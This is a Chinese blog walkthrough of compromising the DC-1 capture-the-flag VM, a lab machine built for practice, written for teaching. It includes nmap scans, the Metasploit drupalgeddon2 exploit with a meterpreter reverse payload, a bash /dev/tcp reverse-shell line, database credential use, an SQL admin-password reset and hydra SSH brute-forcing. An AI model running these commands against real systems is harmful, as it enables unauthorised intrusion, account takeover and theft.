当前位置: 首页 > news >正文

网络安全之DC-1靶机渗透实验

一、下载DC-1靶机虚拟机镜像文件,导入VM虚拟机

https://pan.baidu.com/s/1B1IbAgA8vD9-cZ_mdZy9wA?pwd=qwui

二、设置DC-1的网卡模式为NAT模式,记录其MAC地址
在这里插入图片描述
三、在kali系统中利用nmap工具扫描本网段主机信息

# nmap -sP 192.168.2.0/24 -oN nmap.sP

在这里插入图片描述
由图可知靶机获取到的地址是192.168.2.7
利用获取到的IP地址,进一步对其端口扫描

# nmap -A 192.168.2.7 -p 1-65535 -oN nmap.A

在这里插入图片描述
发现靶机开放22端口(可以爆破)和80端口,在80端口下,可以看到其网站的模板为:Drupal 7(国外三大PHP CMS之一,drual、wordpress、joomla)。

我们先访问一下靶机的80端口
在这里插入图片描述
接下来通过使用MSF直接搜索该网站模板存在的漏洞

启动msf
# msfconsole 

在这里插入图片描述

msf6 > search drupal

在这里插入图片描述通过查看References来查看该漏洞的详细信息

 https://cvedetails.com/cve/CVE-2018-7600/

在这里插入图片描述
选择攻击载荷

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2  选择模块
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp 设置攻击载荷

在这里插入图片描述
缺少目标地址

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.2.7

在这里插入图片描述

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

成功拿到shell
在这里插入图片描述
flag1
在这里插入图片描述
Every good CMS needs a config file - and so do you.这句话指引应该去找的该网站的配置文件所在目录:sites/default/

flag2
在这里插入图片描述

'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',     

接下来进入交互界面,进一步获取信息
在这里插入图片描述
根据获取到的信息尝试连接数据库

mysql -udbuser -pR0ck3t  #连接失败,考虑使用反弹shell

kali机本地监听2333端口
直接反弹失败
在这里插入图片描述
使用python反弹

meterpreter > shell
Process 3791 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ 

在这里插入图片描述

www-data@DC-1:/var/www$ bash -i >& /dev/tcp/192.168.2.10/2333 0>&1

反弹成功
在这里插入图片描述

进入数据库drupladb,查询users数据表

mysql> use drupaldb
mysql> select * from users\G

在这里插入图片描述
重置后台管理员admin用户密码,由于破解admin 用户密码要耗费一定时间,我这里考虑重置admin 用户密码,使用drupal 自带脚本重新生成密码。

www-data@DC-1:/var/www$ php scripts/password-hash.sh admin

在这里插入图片描述
更新users表

mysql> update users set pass="$S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt" where uid=1;

在这里插入图片描述
更新成功,管理员admin的密码已经更改为admin

flag3
使用新密码登录后台
在这里插入图片描述
在这里插入图片描述
按照提示找到/etc/passwd

flag4
在这里插入图片描述
由图可知flag4用户可以登录
使用hydra进行爆破flag4用户密码,在kali系统中执行

# hydra -l flag4 -P /usr/share/john/password.lst 192.168.2.7 ssh -vV -f -o hydra.ssh

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
检查一下是否有一些命令具有SUID 标志
在这里插入图片描述
利用操作系统内核提权
在这里插入图片描述
成功获取root权限
在这里插入图片描述

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • OZON免费选品工具大揭秘
  • 【Rust光年纪】深度解读:Rust语言中各类消息队列客户端库详细对比
  • azure-search-openai-demo-csharp does not deploy correctly to azure clooad
  • PostgreSQL初始化数据库和用户
  • 哈希表两数求和
  • SpringBoot-读取配置文件方式
  • 智能学习辅助系统——后端部分
  • zigbee笔记、十五、组播通信原理
  • 【60天备战2024年11月软考高级系统架构设计师——第0天:详细规划与学习心得】
  • 为什么需要对即将上线的系统进行压力测试
  • Vue——认识day02
  • 力扣刷题--2185. 统计包含给定前缀的字符串【简单】
  • 虚幻引擎UE5入坑记
  • 2024Android面试题与答案(2)
  • 三种tcp并发服务器实现程序
  • “寒冬”下的金三银四跳槽季来了,帮你客观分析一下局面
  • 【跃迁之路】【585天】程序员高效学习方法论探索系列(实验阶段342-2018.09.13)...
  • CEF与代理
  • JS 面试题总结
  • Linux Process Manage
  • Terraform入门 - 3. 变更基础设施
  • 阿里云前端周刊 - 第 26 期
  • 电商搜索引擎的架构设计和性能优化
  • 机器学习 vs. 深度学习
  • 聊聊flink的BlobWriter
  • 前端之React实战:创建跨平台的项目架构
  • 前言-如何学习区块链
  • Android开发者必备:推荐一款助力开发的开源APP
  • #QT(智能家居界面-界面切换)
  • #WEB前端(HTML属性)
  • #我与Java虚拟机的故事#连载07:我放弃了对JVM的进一步学习
  • $分析了六十多年间100万字的政府工作报告,我看到了这样的变迁
  • (1)(1.13) SiK无线电高级配置(五)
  • (MIT博士)林达华老师-概率模型与计算机视觉”
  • (python)数据结构---字典
  • (STM32笔记)九、RCC时钟树与时钟 第二部分
  • (二)学习JVM —— 垃圾回收机制
  • (蓝桥杯每日一题)love
  • (七)glDrawArry绘制
  • (四)Controller接口控制器详解(三)
  • (四)TensorRT | 基于 GPU 端的 Python 推理
  • (译)2019年前端性能优化清单 — 下篇
  • (转)linux 命令大全
  • (转)使用VMware vSphere标准交换机设置网络连接
  • .axf 转化 .bin文件 的方法
  • .NET 4.0中使用内存映射文件实现进程通讯
  • .NET CF命令行调试器MDbg入门(二) 设备模拟器
  • .NET/C# 异常处理:写一个空的 try 块代码,而把重要代码写到 finally 中(Constrained Execution Regions)
  • .NET编程C#线程之旅:十种开启线程的方式以及各自使用场景和优缺点
  • .net网站发布-允许更新此预编译站点
  • /bin/bash^M: bad interpreter: No such file ordirectory
  • @ModelAttribute 注解
  • [100天算法】-不同路径 III(day 73)
  • [1181]linux两台服务器之间传输文件和文件夹
  • [C++] cout、wcout无法正常输出中文字符问题的深入调查(1):各种编译器测试